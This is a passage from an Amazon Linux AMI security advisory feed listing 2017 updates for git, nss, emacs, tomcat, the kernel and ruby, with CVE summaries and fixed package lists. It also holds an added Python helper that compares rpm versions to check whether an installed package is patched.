name="samba-client" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.6.2-11.36.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.6.2" release="11.36.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.6.2-11.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-910</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-910: medium priority package update for git</title><issued date="2017-10-12 19:39:00" /><updated date="2022-12-15 17:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14867:
Git before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name. The vulnerable code is reachable via git-shell even without CVS support.
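The ranges above are upstream git versions, but what a host actually runs is the packaged epoch/version/release in the package list that follows, and a distribution may backport the fix without moving the upstream version. The following Python is an added example, not code from the advisory feed, from git, or from yum/rpm: it reimplements rpm's version comparison so that both questions can be answered offline, first whether a stock upstream version falls inside the CVE's stated ranges, then whether an installed package is older than the fixed build. The fixed epoch/version/release 0:2.13.6-1.55.amzn1 is taken from this advisory's package list; the function and variable names are the example's own.

```python
import re

_DIGITS = re.compile(r"[0-9]+")
_ALPHA = re.compile(r"[A-Za-z]+")
_SEPARATORS = re.compile(r"^[^0-9A-Za-z~]+")


def rpmvercmp(a, b):
    """Compare two RPM version or release strings the way rpm's rpmvercmp() does.

    Returns 1 if a is newer, -1 if a is older, 0 if equal.  Segments compare
    numerically when both are digit runs (2.10 is newer than 2.9), lexically
    when both are letter runs, and a digit segment beats a letter segment.  A
    tilde sorts before anything, even the end of the string (1.0~rc1 is older
    than 1.0).  The caret rule of newer rpm is not needed for these packages.
    """
    if a == b:
        return 0
    one, two = a, b
    while one or two:
        one = _SEPARATORS.sub("", one)
        two = _SEPARATORS.sub("", two)
        if one.startswith("~") or two.startswith("~"):
            if not one.startswith("~"):
                return 1
            if not two.startswith("~"):
                return -1
            one, two = one[1:], two[1:]
            continue
        if not one or not two:
            break
        m1 = _DIGITS.match(one)
        isnum = m1 is not None
        if isnum:
            m2 = _DIGITS.match(two)
        else:
            m1 = _ALPHA.match(one)
            m2 = _ALPHA.match(two)
        if m2 is None:
            return 1 if isnum else -1  # mixed segment types: numeric wins
        seg1, seg2 = m1.group(0), m2.group(0)
        one, two = one[len(seg1):], two[len(seg2):]
        if isnum:
            seg1, seg2 = seg1.lstrip("0"), seg2.lstrip("0")
            if len(seg1) != len(seg2):
                return 1 if len(seg1) > len(seg2) else -1
        if seg1 != seg2:
            return 1 if seg1 > seg2 else -1
    if not one and not two:
        return 0
    return -1 if not one else 1


def evr_cmp(a, b):
    """Compare (epoch, version, release) triples: epoch first, then version,
    then release, which is why the epoch attribute in the package list matters."""
    ea, va, ra = a
    eb, vb, rb = b
    if int(ea) != int(eb):
        return 1 if int(ea) > int(eb) else -1
    c = rpmvercmp(va, vb)
    return c if c != 0 else rpmvercmp(ra, rb)


# Fixed git build from the ALAS-2017-910 package list: epoch, version, release.
FIXED_GIT = ("0", "2.13.6", "1.55.amzn1")


def needs_update(installed_evr, fixed_evr=FIXED_GIT):
    """True when the installed package is older than the advisory's fixed build.
    installed_evr is what rpm -q --qf '%{EPOCH} %{VERSION} %{RELEASE}' git prints,
    split on whitespace; rpm prints '(none)' for a missing epoch, which means 0."""
    e, v, r = installed_evr
    if e in ("(none)", "", None):
        e = "0"
    return evr_cmp((e, v, r), fixed_evr) == -1


# Upstream ranges stated in the CVE text; 2.15 and later are outside every range.
_AFFECTED_SERIES = [("2.11", "2.11.4"), ("2.12", "2.12.5"), ("2.13", "2.13.6"), ("2.14", "2.14.2")]


def cve_2017_14867_affects(upstream_version):
    """Whether a stock upstream git version lies inside the CVE's stated ranges.
    For a distribution package use needs_update() against the advisory build instead."""
    for series, first_fixed in _AFFECTED_SERIES:
        if upstream_version == series or upstream_version.startswith(series + "."):
            return rpmvercmp(upstream_version, first_fixed) == -1
    return rpmvercmp(upstream_version, "2.10.5") == -1
```

The same rpmvercmp/evr_cmp pair works for any other update in this feed: read the epoch, version and release attributes of the package element for the installed architecture and compare them with the output of rpm -q for that package name.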
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14867" title="" id="CVE-2017-14867" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="git-all" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-p4" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-email" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="perl-Git" version="2.13.6" release="1.55.amzn1" epoch="0" 
arch="noarch"><filename>Packages/perl-Git-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="emacs-git-el" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.13.6" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.13.6-1.55.amzn1.x86_64.rpm</filename></package><package name="git-cvs" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.13.6" release="1.55.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.13.6-1.55.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.13.6-1.55.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.13.6" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.13.6-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-911</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-911: important priority package update for nss</title><issued date="2017-10-12 19:41:00" /><updated date="2017-10-13 00:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7805:
A use-after-free flaw was found in the TLS 1.2 implementation in the NSS library when client authentication was used. A malicious client could use this flaw to cause an application compiled against NSS to crash or, potentially, execute arbitrary code with the permission of the user running the application.
1471171:
CVE-2017-7805 nss: Potential use-after-free in TLS 1.2 server when verifying client authentication
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7805" title="" id="CVE-2017-7805" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-pkcs11-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="12.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.28.4-12.80.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.28.4" release="12.80.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-pkcs11-devel-3.28.4-12.80.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.28.4" release="12.80.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.28.4-12.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-912</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-912: important priority package update for emacs</title><issued date="2017-10-12 20:38:00" /><updated date="2017-10-13 00:11:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14482:
A command injection flaw within the Emacs &quot;enriched mode&quot; handling has been discovered. By tricking an unsuspecting user into opening a specially crafted file using Emacs, a remote attacker could exploit this flaw to execute arbitrary commands with the privileges of the Emacs user.
1490409:
CVE-2017-14482 emacs: command injection flaw within "enriched mode" handling
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14482" title="" id="CVE-2017-14482" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.22.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.22.amzn1.noarch.rpm</filename></package><package name="emacs-common" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.22.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.22.amzn1.x86_64.rpm</filename></package><package name="emacs-common" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.22.amzn1.i686.rpm</filename></package><package name="emacs" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.22.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.22.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-913</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-913: important priority package update for tomcat8 tomcat80 tomcat7</title><issued date="2017-10-26 16:29:00" /><updated date="2017-10-26 22:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-12617:
A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution.
1494283:
CVE-2017-12617 tomcat: Remote Code Execution bypass for CVE-2017-12615
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617" title="" id="CVE-2017-12617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-admin-webapps" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.23" release="1.75.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.23" release="1.75.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.23-1.75.amzn1.noarch.rpm</filename></package><package name="tomcat80" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-log4j" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-log4j-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-jsp-2.3-api" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-jsp-2.3-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-admin-webapps" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-admin-webapps-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-webapps" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-webapps-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-el-3.0-api" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-el-3.0-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-lib" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-lib-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-servlet-3.1-api" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-servlet-3.1-api-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-docs-webapp" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-docs-webapp-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat80-javadoc" version="8.0.47" release="1.78.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat80-javadoc-8.0.47-1.78.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.82" release="1.30.amzn1" 
epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.82" release="1.30.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.82-1.30.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-914</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-914: important priority package update for 
kernel</title><issued date="2017-10-26 16:43:00" /><updated date="2017-10-26 23:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-15274:
A flaw was found in the implementation of associative arrays where the add_key system call and KEYCTL_UPDATE operations allowed for a NULL payload with a nonzero length. When accessing the payload within this length parameter's value, an unprivileged user could trivially cause a NULL pointer dereference (kernel oops).
1500391:
CVE-2017-15274 kernel: dereferencing NULL payload with nonzero length
CVE-2017-14991:
The sg_ioctl() function in &#039;drivers/scsi/sg.c&#039; in the Linux kernel, from version 4.12-rc1 to 4.14-rc2, allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for &#039;/dev/sg0&#039;.
1500366:
CVE-2017-14991 kernel: Information leak in the scsi driver
CVE-2017-14340:
A flaw was found where the XFS filesystem code mishandles a user-settable inode flag in the Linux kernel prior to 4.14-rc1. This can cause a local denial of service via a kernel panic.
1491344:
CVE-2017-14340 kernel: xfs: unprivileged user kernel oops
CVE-2017-12192:
CVE-2017-12154:
Linux kernel built with the KVM virtualization support (CONFIG_KVM), with the nested virtualization (nVMX) feature enabled (nested=1), is vulnerable to a crash due to disabled external interrupts, as an L2 guest could access (r/w) the hardware CR8 register of the host (L0). In a nested virtualization setup, an L2 guest user could use this flaw to potentially crash the host (L0), resulting in DoS.
1491224:
CVE-2017-12154 Kernel: kvm: nVMX: L2 guest could access hardware(L0) CR8 register
CVE-2017-1000251:
A stack buffer overflow flaw was found in the way the Bluetooth subsystem of the Linux kernel processed pending L2CAP configuration responses from a client. On systems with the stack protection feature enabled in the kernel (CONFIG_CC_STACKPROTECTOR=y, which is enabled on all architectures other than s390x and ppc64[le]), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to crash the system. Due to the nature of the stack protection feature, code execution cannot be fully ruled out, although we believe it is unlikely. On systems without the stack protection feature (ppc64[le]; the Bluetooth modules are not built on s390x), an unauthenticated attacker able to initiate a connection to a system via Bluetooth could use this flaw to remotely execute arbitrary code on the system with ring 0 (kernel) privileges.
1489716:
CVE-2017-1000251 kernel: stack buffer overflow in the native Bluetooth stack
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000251" title="" id="CVE-2017-1000251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12154" title="" id="CVE-2017-12154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12192" title="" id="CVE-2017-12192" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14340" title="" id="CVE-2017-14340" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14991" title="" id="CVE-2017-14991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15274" title="" id="CVE-2017-15274" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.58" 
release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.58" release="18.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.58-18.51.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.58" release="18.51.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.58" release="18.51.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.58-18.51.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.58" release="18.51.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.58-18.51.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-915</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-915: medium priority package update for ruby24</title><issued date="2017-10-26 17:01:00" /><updated date="2018-01-18 20:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14064:
Ruby through 2.2.7, 2.3.x through 2.3.4, and 2.4.x through 2.4.1 can expose arbitrary memory during a JSON.generate call. The issue lies in using strdup in ext/json/ext/generator/generator.c, which will stop after encountering a &#039;\\0&#039; byte, returning a pointer to a string of length zero, which is not the length stored in space_len.
1487552:
CVE-2017-14064 ruby: Arbitrary heap exposure during a JSON.generate call
CVE-2017-14033:
The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service (interpreter crash) via a crafted string.
1491866:
CVE-2017-14033 ruby: Buffer underrun in OpenSSL ASN1 decode
CVE-2017-10784:
The Basic authentication code in WEBrick library in Ruby before 2.2.8, 2.3.x before 2.3.5, and 2.4.x through 2.4.1 allows remote attackers to inject terminal emulator escape sequences into its log and possibly execute arbitrary commands via a crafted user name.
1492012:
CVE-2017-10784 ruby: Escape sequence injection vulnerability in the Basic authentication of WEBrick
CVE-2017-0903:
A vulnerability was found where the rubygems module was vulnerable to an unsafe YAML deserialization when inspecting a gem. Applications inspecting gem files without installing them can be tricked to execute arbitrary code in the context of the ruby interpreter.
1500488:
CVE-2017-0903 rubygems: Unsafe object deserialization through YAML formatted gem specifications
CVE-2017-0902:
RubyGems version 2.6.12 and earlier is vulnerable to a DNS hijacking vulnerability that allows a MITM attacker to force the RubyGems client to download and install gems from a server that the attacker controls.
1487589:
CVE-2017-0902 rubygems: DNS hijacking vulnerability
CVE-2017-0901:
RubyGems version 2.6.12 and earlier fails to validate specification names, allowing a maliciously crafted gem to potentially overwrite any file on the filesystem.
1487587:
CVE-2017-0901 rubygems: Arbitrary file overwrite due to incorrect validation of specification name
CVE-2017-0900:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that cause a denial of service against RubyGems clients that have issued a `query` command.
1487588:
CVE-2017-0900 rubygems: No size limit in summary length of gem spec
CVE-2017-0899:
RubyGems version 2.6.12 and earlier is vulnerable to maliciously crafted gem specifications that include terminal escape characters. Printing the gem specification would execute terminal escape sequences.
1487590:
CVE-2017-0899 rubygems: Escape sequence in the "summary" field of gemspec
CVE-2017-0898:
Ruby before 2.4.2, 2.3.5, and 2.2.8 is vulnerable to a malicious format string which contains a precision specifier (*) with a huge negative value. Such a situation can lead to a buffer overrun, resulting in heap memory corruption or an information disclosure from the heap.
1492015:
CVE-2017-0898 ruby: Buffer underrun vulnerability in Kernel.sprintf
